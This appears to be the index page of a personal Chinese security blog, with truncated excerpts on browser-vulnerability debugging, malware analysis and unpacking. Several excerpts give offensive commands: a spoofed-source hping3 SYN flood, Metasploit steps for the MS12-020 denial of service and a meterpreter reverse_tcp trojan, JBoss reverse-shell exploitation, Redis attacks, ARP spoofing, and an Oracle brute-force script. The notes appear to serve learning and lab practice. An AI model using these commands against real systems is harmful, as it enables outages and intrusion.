weixin_42539095的博客

原创 VBscript数组在内存中的布局

VBScript的数组内存布局和C语言有些不太一样。A（1，2）数组的内存布局为 A(0,0) A(1,0) A(0, 1), A(1,1), A(0, 2), A(1,2), 而每个元素大小为0×10字节(cbElements)如下代码<!doctype html><html lang="en"><head></head><body><script LANGUAGE="VBScript"> dim a(1,2

原创 Variant结构深入分析

数组vbscript中数组由SAFEARRAY和SAFEARRAYBOUND结构体定义SAFEARRAY:1. typedef struct tagSAFEARRAY { 2. USHORT cDims; // 数组维数 3. USHORT fFeatures; // 数组特性 4. ULONG cbElements; // 每个元素大小 5. ULONG cLocks; // 锁定计数 6. PVOID pvData; // 实际数组数据指针 7. SAFEAR

原创 Windows7 x86环境下配置windbg的注意点

以前一直在64位环境下使用windbg，在x86下配置时遇到一些坑，这里做个总结：1.环境变量的配置在用户变量的位置配置名称：_NT_SYMBOL_PATH 值SRVc:\mysymbol http://msdl.microsoft.com/download/symbolsc盘下新建mysymbol目录就行，同时在windbg界面对应的位置填上这个值2.下载不了符号官网已经很久ping不通了，需要开全局代理（IE浏览器相关配置处）浏览器——工具——Internet选项——连接——局域网设置—

原创 浏览器漏洞调试技巧记录

windbg 打开堆调试开关：C:\Windows\system32>gflags.exe /i iexplore.exe +hpa -ust限制对 JScript.dll 的访问对于 32 位系统，在管理命令提示符处输入以下命令： takeown /f %windir%\system32\jscript.dll cacls %windir%\system32\jscript.dll /E /P everyone:N对于 64 位系统，在管理命令提示符处输入以下命令： takeo

原创 拒绝服务的几种攻击方式

1.使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u10002.MS12-020msfconsoleuse auxiliary/dos/windows/rdp/ms12_020_maxchannelidsset RHOST ipset LHOST ipexploit3

原创 目录扫描工具

dirsearch 下载地址https://github.com/maurosoria/dirsearch-u 指定网址-e 指定网站语言-w 指定字典-r 递归目录（跑出目录后，继续跑目录下面的目录）–random-agents 使用随机UA使用：python dirsearch.py -u 网址 -e php...

原创 .net样本分析

1.样本如果加壳，先用UnConfuserEx脱壳工具做脱壳处理2.常用工具dnspy调试3.将样本拖入其中，点到资源处，然后右键转到入口点4.入口点被混淆了，无法读，用解混淆工具de4dot解混淆后分析

原创 攻击手法简记

1.缓冲区溢出覆盖的返回地址应对方法：DEPDEP全称是Data Execution Prevention，可以分为硬件的DEP和软件的DEP。但是目的都是一致的。阻止数据页上代码执行2.攻击SEH SEH存放在栈内，故超长的数据就可能覆盖掉SEH ,其中将异常处理函数的入口地址更改为shellcode的起始地址应对方法：在VS2003(.net)当中支持了/SafeSEH的选项，用于应对针对S E H的攻击。后来又进一步推出了SEHOP3.return to libc DEP

原创 Web类漏洞实战入门

环境Web类漏洞原理相比于二进制较为简单，在学习这一部分内容的时候建议以实战的方式进行，这样会比较有趣一些。我们可以到网上下载一些安全产品，比如安全狗之类的。然后在本地虚拟机中搭建一个漏洞环境，以验证产品防护效果的方式去进行学习，然后尝试各种不同的攻击手法。1.下载安全狗并安装:http://www.safedog.cn/登录官网，然后申请试用，之后在我们搭建完漏洞环境之后就可以用它来查看防护效果了2.安装JSPstudyhttp://www.phpstudy.net/3.下载漏洞环境并安装

原创 JBOSS漏洞利用（CVE-2017-12149）

下载工具：http://scan.javasec.cn/java/JavaDeserH2HC.zip使用：root@kali:~/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.javaroot@kali:~/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ReverseShellCommons

原创 Redis攻击利用

环境：在sever2008和kali中分别安装redis安装步骤参考：https://www.runoob.com/redis/redis-install.html修改redis.windows.conf中bind 0.0.0.0kali中测试是否连通：telnet 192.168.13.198 6379攻击利用：root@kali:/redis-2.8.17/src# ./redis-cli -h 192.168.13.198192.168.13.198:6379> CONFIG

原创 傀儡进程

常见傀儡进程流程：（1）CreateProcess一个进程，并挂起，即向dwCreationFlags 参数传入CREATE_SUSPENDED；(2) GetThreadContext获取挂起进程CONTEXT，其中，EAX为进程入口点地址，EBX指向进程PEB;(3) ZwUnmapViewOfSection卸载挂起进程内存空间数据；(4) VirtualAlloc分配内存空间；(5) WriteProcessMemory将恶意代码写入分配的内存；(6) SetThreadContext设置

原创 VS2013调试过程中无法找到kernel32等lib库的处理方法

原创 IE浏览器调试（Vbscript中常见结构）

先来了解一下Vbscript中的一些结构变量vbscript中变量由VARIANT结构体定义，内存占用大小为0x10，其结构如下(简化了union部分):typedef struct tagVARIANT {VARTYPE varType; +0x0: word 变量的类型值WORD wReserved1;WORD wReserved2;WORD wReserved3;DWORD dataLow; +0x8: dword 存放实际的元素数据DW

原创 IE浏览器POC构造

前言针对IE类漏洞，在POC构造的过程中，大多数是通过修改safemode实现，关于safemode在上一篇有详细介绍过，现对两个比较常见的漏洞做出一些构造方法上的总结。一.CVE-2016-0189漏洞成因：在vbs解析引擎中，数组中指定下标时会调用vbscript!AccessArray中的vbscript!rtVariantChangeTypeEx函数，vbscript!rtVariantChangeTypeEx函数并没有实现而是调用了oleaut32!VariantChangeTypeEx函

原创 调试技巧（镜像劫持）

背景在调试CVE-2017-11882的过程中，执行poc文档，通过动态工具可以知道，winword.exe创建了EQNEDT32.EXE，然后EQNEDT32.EXE启动了 cmd.exe，EQNEDT32.EXE使用 WinExec 创建的进程 cmd.exe，最后由cmd.exe打开了计算器。那么，EQNEDT32.EXE无法直接调试，该如何解决呢？注册表镜像劫持1.打开注册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current

原创 IE开启上帝模式

SafeModeSafeMode 是 Windows 操作系统中针对安全的一种特殊模式，即安全模式。默认情况下 vbscript 脚本执行权限是非常低的，正是因为safemode 安全属性的限制（正常情况下该属性值为 0xE。），如若我们能通过一定方法修改掉此属性值改为0，即可绕过安全权限检查，即进入上帝模式。而且，经过调试发现在 COleScript 对象偏移 0x174(不同版本可能偏移不一样) 位置正是 SafeMode标志位(结论记住就行，前人逆向出来的经验)。代码<html>&

原创 补丁对比工具

一.jdk安装二.IDA安装三.bindiff安装下载地址：https://www.zynamics.com/software.html注意点：1.指出自己ida pro安装的目录2.bindiff不能直接分析exe程序，而只能先使用ida pro的.i64数据库基础上进行分析。因此需要先用ida pro分别打开bindiff1.exe和bindiff2.exe再关闭，以创建.i64数据库3.到安装目录bin文件夹下双击bindiff.jar即可启动bindiff4.主菜单----Diff

原创 oracle密码爆破

# -*-coding:utf-8 -*-"""Oracle爆破脚本用法：参数-u [用户字典] -p [密码字典]破解成功的密码亮色输出"""import optparseimport threadingimport cx_Oracle as cxdef Blast(user_dics, pwd_dics):#爆破 dsn = cx.makedsn('127.0.0.1', '1521', 'orcl') # ip,端口 success = False us

原创 shellcode分析过程中符号还原

一.基本操作在逆向分析的过程中涉及大量符号还原的部分，该部分主要介绍一些PE结构符号还原通过 View->Open subviews->Type libraries 打开类型库窗口，可以看到当前 IDA 加载的类型库View->Open subview->Structures 打开结构体窗口，可以看到 IDA 当前 的工程数据库中已经包含的所有标准和用户自定义的结构体信息在结构体窗口中，Insert 键添加结构体，选择 add standard structure添加所需

原创 驱动样本分析入门

一.搭建双机调试环境将 VirtualKD双击解压将vminstall.exe在虚拟机中安装，重启运行vmmon.exe，找到Windbg的路径vminstall.exe在虚拟机中安装重启，选择启用调试程序并点击Run debugger，便会连接到虚拟机，同时会弹出Windbg二.驱动样本调试VirtualKD搭建起来双机调试环境之后用如下工具将驱动注册为服务然后再在windbg中断到驱动入口函数处，去调试1: kd> lm找到我们要调试的sys先要断到sxe ld 2

原创 IRP管理文件

NTSTATUS IrpCreateFile( OUT PFILE_OBJECT *ppFileObject, IN ACCESS_MASK DesiredAccess, IN PUNICODE_STRING pustrFilePath, OUT PIO_STATUS_BLOCK IoStatusBlock, IN PLARGE_INTEGER AllocationSize OPTIONAL, IN ULONG FileAttributes, IN ULONG ShareAccess, IN

原创 shellcode编写

开发框架地址： https://github.com/TonyChen56/ShellCodeFrame实现功能弹出计算器具体实现（1）在这个框架中，利用b.work.cpp源文件中的GetProcAddressWithHash函数，通过传入WinExec 函数的hash值，就可以获取到WinExec函数的相对地址。（2）定义函数指针 在a.start.cpp源文件ShellCodeEntry()函数中添加WinExec("calc.exe ", SW_SHOW);将声明复制到api.h

原创 断网攻击以及简单木马制作

断网攻击扫描：比如kali本身ip为192.168.1.32使用arpspoof进行arp攻击本身网卡：eth0，攻击对象：192.168.1.201 网关：192.168.1.1木马制作方法一：使用模块：use exploit/multi/handler载荷：set payload windows/metepreter/reverse_tcp填入：show options...

原创 Metasploit入门

一．安装Kali中自带图形化Windows平台下安装下载之后一路下一步设置环境变量选择path新建开始菜单中输入msfconsole或者用bat文件启动二．基本用法最基本组合：搜索模块：search ms17-01使用模块：use exploit/window/smb/ms17_010_eternalblue配置相应信息：show options，set R...

原创 kali中安装软件

kali中安装软件输入法的安装以及配置原有卸载Reboot一下安装官网下载拖拽到主目录看一下安装提示有依赖包没有安装输入如下命令解决依赖问题重新安装Reboot安装完成Wps安装下载放到主目录安装查看双击后出现问题解决方式先下载一个字体的包命名拖拽到主目录完成...

原创 kali软件安装

VMware Tools安装以及gif文件分离刚开始学习kali，记录一些学习笔记*VMware Tools安装1.选择点击后会显示桌面出现图标，点击打开文件夹复制下面文件粘贴到主目录查看解压显示如下进入相应目录执行pl文件完成重启即可Gif文件分离移除背景白色合并文件类型查看属性...

原创 宏病毒分析要点

练习过一些宏病毒，总结一些最基本的方法一．查看提示启用内容，选择启用Alt+F11即可查看宏代码二.加密部分宏加了密码可以用如下工具破解三．快速查找关键语句大量简单的宏病毒直接在代码中搜索shell或者run即可找到关键的执行部分Ctrl+F，输入shell或者run查找，找到后下断点执行过来选择左侧点击即可下断然后运行本地窗口查看，调试添加监视即可看到关键部...

原创 MoleBox脱壳

复习一下这个壳的脱法，关键在于修复先esp来到下面跟进call eax这里便是OEP，dump之后发现运行有问题，于是查看IAT可以发现有一些有问题，下硬件断点重载，看啥时候写入运行到这个位置时发现原先的时候是正确的说明这个IAT地址发生过改变，单步单步跟到这里发现有个赋值的指令。改变了IATnop至此修复即可...

原创 fsg脱壳

前段时间学过一个fsg的壳，复习一下，写成笔记老规矩，先查一下壳载入OD后直接来到下面下断，运行后跳过去就是OEPdump修复发现只找到一个手动查找一下OD中输入将如下位置的FFFFF及7FFFFF改成0，重新获取即可再次查找保存，完成...

原创 WinUpack脱壳

**刚学过一个壳，写个笔记查壳：用OD载入看到push eax 根据堆栈平衡可以用esp定律，下断单步来到下面再次esp然后单步几次，来到如下位置多次调试，可以发现，它会根据eax的值不断的跳来跳去，当eax为0时会跳到OEP下条件断点eax==0来到OEPdum并修复即可...